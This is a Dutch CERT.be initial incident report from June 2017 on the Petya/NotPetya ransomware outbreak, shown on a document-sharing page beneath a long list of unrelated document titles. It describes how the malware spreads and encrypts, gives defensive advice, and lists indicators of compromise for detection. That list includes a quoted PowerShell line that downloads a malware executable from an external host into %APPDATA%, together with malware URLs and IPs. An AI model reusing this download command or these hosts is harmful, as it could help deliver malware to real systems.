Petya ransomware aanval

Vergelijkbare documenten
Het is voorlopig nog onduidelijk wie achter deze aanvallen zit en wat de initiële infectievector is.

Het is voorlopig nog onduidelijk wie achter deze aanvallen zit en wat de initiële infectievector is.

Gratis bescherming tegen zero-days exploits

Insecurities within automatic update systems

1 Ransomware Preventie Slachtoffer van ransomware?... 8

Petya/NotPetya Malware

DIGIPASS Native Bridge wordt niet gedetecteerd wanneer de DIGIPASS 870 bekabeld gebruikt wordt.

Ransomware is here to stay: bescherm jezelf

Voor op afstand os installatie moeten de volgende onderdelen geïnstalleerd zijn op de Windows 2000 server.

De Security System Integrator Het wapen tegen onbekende dreigingen

Labo-sessie: Gegevensbeveiliging

Wat te doen tegen ransomware

2 Inleiding Server 2012 ii.2 VMware installeren en gereedmaken

Upgrade EEPC naar Drive Encryption 7.1

Installatie Procedure Femap STAND ALONE & FLOATING LICENTIE

PO1168 EnVivoUSB netwerk hub 1. Ik kan de aangesloten USB apparaten in mijn netwerk niet gebruiken

Maak een image file van je harddisk

Criminaliteit op internet: Ransomware

Datum 15 juni 2006 Versie Exchange Online. Handleiding voor gebruiker Release 1.0

Kwaadaardige software blokkeert PC s van eindgebruikers en lijkt afkomstig van Ecops, FCCU of een andere buitenlandse politiedienst

Solcon Online Backup. Aan de slag handleiding voor Linux

NIEUWSFLASH

Les 2, do : Inleiding Server 2012 ii.2 VMware installeren en gereedmaken

Lesplan: Schooljaar versie: 1.0. HICMBO4P MS Server 2012 Planning

Multi user Setup. Firebird database op een windows (server)

Introductie Veiligheidseisen Exploiten Conclusie. Browser security. Wouter van Dongen. RP1 Project OS3 System and Network Engineering

Symantec Backup Exec System Recovery to VMware ESX Machine

MULTIFUNCTIONELE DIGITALE SYSTEMEN. Aanmaken van Templates voor Re-Rite

Les 3, di : De Installatie van Windows Server Windows Server De installatie van Windows Server 2012

Les 2, ma : Inleiding Server 2012 ii.2 VMware installeren en gereedmaken

Macrium Reflect V4.2 Handleiding

Security Les 1 Leerling: Marno Brink Klas: 41B Docent: Meneer Vagevuur

Internetbedreigingen in 2003

Meldingen Cijfers over meldingen aan CERT.be

Inhoudsopgave. GlinQ: BattleField2 beheertool, Handleiding versie 1.0

2 Inleiding Server 2012 Donderdag 4 Februari 2016 ii.2 VMware installeren en gereedmaken

Je website veilig de zomer(vakantie) door

Windows server Wesley de Marie. Wesley

Criminaliteit op internet: Ransomware

HOWTO: Microsoft Domain Controller en Linux DNS-server. geschreven door Johan Huysmans

Handleiding FTP. Uitleg over het aanpassen van de website uit het basispakket, met het programma FileZilla

Vergeten wachtwoord in Windows 10

LOOPBAAN. Presentatie voor de loopbaanoriëntatiedag van de Leidsche Flesch Sander Kievit

Standard Parts Installatie Solid Edge ST3

HOE RANSOMWARE JOUW ORGANISATIE KAN GIJZELEN. Ransomware aanvallen en hoe deze worden uitgevoerd

Netwerkbeveiliging. Sven Sanders

SECURITY UITDAGINGEN 2015

Backup Connect installatie van de Client software.

Bestandssystemen. yvan vander sanden. 16 maart 2015

Clausule verhoor ransomware

WAVIX Installatie Handleiding

MS Exchange instellingen

Aanmaken van een NBB-certificaat

Stappen om EduVPN te activeren:

KPDdoc kerneigenschappen

Technical Note #047 Auteur:Mark Vork Gemaakt op:14 februari 2003 Gewijzigd op:9 februari 2004

BelgoVault Backup Partner installatie van de Client software.

Backup Connect installatie van de Client software

Vraag : Antwoord : Meer Infos.pdf. Wat zijn de minimum systeemeisen voor Bouwsoft?

HANDLEIDING ENTERPRISE DRIVE. Laatst bijgewerkt: January 18, 2016

UBUNTU 8 installatie. 13/10/ ivowebschool.be/ /205bc10d-ef8e-4a 1/14. Onderwerpen

AHSAY OBM QUICK START GUIDE

HOW TO RESTORE A SYSTEM IMAGE IN WINDOWS SERVER 2012

Dit document beschrijft belangrijke aandachtspunten voor de installatie van Deep Defender. Ook omschrijft dit document hoe de beheerder kan omgaan

COMPUTERONDERHOUD. Pagina 1 van 9

Installatie Handleiding Alimentatie Rekendisk Sdu Uitgeverij / A. Koppenaal

2 Installatie Windows Server 2008 R2 Standard

PRIJSLIJST EINDKLANTEN DOMEINNAMEN EN SHARED WEBHOSTING

Pagina 1. Installatiehandleiding vanaf versie 2017

Resultaten van de scan. Open poorten. High vulnerabilities. Medium vulnerabilites. Low vulnerabilities

Quickstart handleiding

Installatie Domein Windows 2000

Systeemeisen Exact Compact product update 406

Download en installatie door de hoofdgebruiker

DUPLICATI (Bestand back-up)

Inhoud 0 Inleiding 1 Algemene netwerkbegrippen De installatie van Windows Server 2003

Digitaal certificaat Ondertekenen en encryptie. De meest recente versie van dit document kunt u vinden op:

Cloud2 Online Backup

FerdiWeb Back-up. Installatie FerdiWeb Back-up

1-poorts USB Wireless N netwerkprintserver met 10/100 Mbps Ethernet-poort b/g/n

Installeer Apache2: Landstede februari 2009 versie 3 1 Bertil Hoentjen

SELinux (project 073)

Om gebruik te maken van het draadloze netwerk Eduroam, zal het programma SecureW2 geïnstalleerd moeten worden.

VPN Remote Access Control

Goedkope DSL aansluitingen hebben voor de bewaking op afstand een belangrijk nadeel:

Indicators of Compromise

Introduceert KASPERSKY ENDPOINT SECURITY FOR BUSINESS

Bewustwording Ransomware Virussen

Technische nota AbiFire5 Rapporten maken via ODBC

FAQ Veel gestelde vragen

Installatie Handleiding Extra Werkstation

Solution domain. Cloud PC Backup/startkit voor partners. Datum 26/05/2015 Vertrouwelijkheid Unrestricted Onze referentie V1.

Encryptie deel III; Windows 2000 EFS

BSCW-WebDAV Handleiding

MULTIFUNCTIONELE DIGITALE SYSTEMEN. Aanmaken van Templates voor scan-to-file

Handleiding installatie en gebruik. Ahsay OBM. Windows server Apple OS X Linux en UNIX-varianten

EQ3 Bodygram plus software

MS Virtual pc 2007 Handleiding

Uitleg SPF, DKIM & DMARC

Keynote: Gevaren van zowel het GSM als het Wi-Fi netwerk

Transcriptie:

Petya ransomware aanval Intieel Rapport TLP: [WHITE]

Inhoud 1 Samenvatting... 3 2 Advies... 4 3 IOC s... 5 Petya ransomware aanval - 27 June 2017 - TLP: [WHITE] 2

1 SAMENVATTING DREIGING SLACHTOFFERS DADERS HOOG wereldwijd bedrijven + onbekend individuen CERT.be ontving informatie via betrouwbare partners dat de Oekraïnische overheid, Russische bedrijven en een containerterminal bedrijf uit Denemarken onder aanval lagen van een nieuwe ransomware aanval. Kort nadien werd de slachtofferlijst aangevuld met bedrijven uit Nederland, Spanje, Frankrijk, Groot-Britanië en België. Het lijkt te gaan over een nieuwe variant van de Petya ransomware die zich (intern) lijkt te verspreiden via de EternalBlue/DoublePulsar exploit 1 voor SMB die vorige maand furore maakte via de ransomware Wannacry. Eenmaal het systeem geïnfecteerd is, verspreidt de ransomware zich verder via een interne Windows toolkit (WMIC) en via een externe beheertool PsExec. De initiële aanvalvector is momenteel onbekend, maar het wordt geopperd dat het zich zou verspreiden via een excel document met een valse Windows signature 2 (LokiBot 3 ). Eenmaal het systeem geïnfecteerd is met de ransomware, probeert het de harde schijf te encrypteren door gebruik te maken van beheerdersrechten. Indien deze niet voorhanden zijn, gebruikt het een kernel exploit, injecteert het zichtzelf in de MBR 4 van de harde schijf en maakt het een scheduled task aan die een herstart uitvoert na één uur. Bij het heropstarten van het systeem laadt de ransomware zich in het geheugen en begint de encryptie. Er is geen killswitch aanwezig en de ransomware communiceert niet met C2 servers 5. Volgende extensies worden geëncrypteerd: ".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd. kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.v di.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip" Na de encryptie krijgt de gebruiker een scherm te zien met volgende boodschap: Huidige informatie wijst erop dat systemen die gepatcht zijn met de wanacry-patch, toch kwetsbaar zijn voor deze ransomware. Momenteel hebben we weet van infecties op Windows XP, 7 en 10 van verschillende patchniveaus. 1 https://blog.comae.io/byata-enhanced-wannacry-a3ddd6c8dabb 2 https://virustotal.com/fr/file/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745// 3 https://gist.github.com/vulnerscom/65fe44d27d29d7a5de4c176baba45759 4 https://securelist.com/petrwrap-the-new-petya-based-ransomware-used-in-targeted-attacks/77762/ 5 https://twitter.com/gossithedog/status/879734018039836672 Petya ransomware aanval - 27 June 2017 - TLP: [WHITE] 3

2 ADVIES Niet betalen! Het emailadres is niet langer actief; Patch systemen (in het bijzonder MS17-010); Voorkom Local Administrator rechten voor gewone gebruiker; Zoek naar volgende scheduled task en verwijder: o C:\Windows\system32\shutdown.exe /r /f Houd AV/IDS/IPS up-to-date; Voorzie een Backup strategie; Traditionele beschermingsstrategiën tegen Ransomware 6 6 http://www.ccb.belgium.be/sites/default/files/ransomware%20v3.1.pdf Petya ransomware aanval - 27 June 2017 - TLP: [WHITE] 4

3 IOC S Category Type Value url http://185.165.29.78/~alex/svchost.exe External link https://virustotal.com/fr/file/027cc450ef5f8c5f653329641ec1fed91f694e 0d229928963b30f6b0d7d3a745// md5 415fe69bf32634ca98fa07633f4118e1 External url https://www.hybrid.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d2299 28963b30f6b0d7d3a745?environmentId=100 Order-20062017.doc External url https://twitter.com/polartoffee/status/879709615675641856 fe2e5d0543b4c8769e401ec216d78a5a3547dfd426fd47e097df04a5f7d6d 206 External vulnerability CVE-2017-0199 sha1 101cc1cb56c407d5b9149f2c3b8523350d23ba84 url https://yadi.sk/d/s0-zhpy53kwc84 url https://yadi.sk/d/zpkm88sp3kwc8v sha1 736752744122a0b5ee4b95ddad634dd225dc0f73 md5 0487382a4daf8eb9660f1c67e30f8b25 Network ip-dst 84.200.16.242 mshta.exe ee29b9c01318a1e23836b949942db14d4811246fdae2f41df9f0dcd922c63 bc6 myguy.xls Network url h11p://84.200.16.242/myguy.xls Network ip-dst 111.90.139.247 PID: 2588, Additional Context: ( System.Net.WebClient).DownloadFile('h11p://frenchcooking.com/myguy.exe', '%APPDATA%\10807.exe') ;) 10807.exe %APPDATA%\10807.exe %APPDATA%\10807.exe' md5 a1d5895f85751dfe67d19cccb51b051a Petya ransomware aanval - 27 June 2017 - TLP: [WHITE] 5

Network External Analysis domain coffeinoffice.xyz PID: 3096)File Name BCA9D6.exeMD5 Hash Identifier A1D5895F85751DFE67D19CCCB51B051ASHA-1 Hash Identifier 9288FB8E96D419586FC8C595DD95353D48E8A060SHA-256 Hash Identifier 17DACEDB6F0379A65160D73C0AE3AA1F03465AE75CB6AE754C7DCB301 7AF1FBDFile Size 275968 bytesconnects to the host:111.90.139.247 80 COFFEINOFFICE.XYZ 80Pay attention - the trojan on which I give the markers could potentially be used to load the encryption part %APPDATA%\10807.exe sha1 url Sha1 Filepath Email powershell.exe 9288fb8e96d419586fc8c595dd95353d48e8a060 System.Net.WebClient).DownloadFile('h11p://frenchcooking.com/myguy.exe 10807.exe %WINDIR%\System32\mshta.exe C:\myguy.xls.hta BCA9D6.exe 17dacedb6f0379a65160d73c0ae3aa1f03465ae75cb6ae754c7dcb3017af1f bd https://gist.github.com/vulnerscom/65fe44d27d29d7a5de4c176baba457 59 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a7 45 34f917aaba5684fbe56d3c57d48ef2a1aa7cf06d 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94 b1 752e5cf9e47509ce51382c88fc4d7e53b5ca44ba22a94063f95222634b362 ca5 dllhost.dat wowsmith123456@posteo.net Petya ransomware aanval - 27 June 2017 - TLP: [WHITE] 6

2024 © DocPlayer.nl Privacy Policy | Terms of Service | Feedback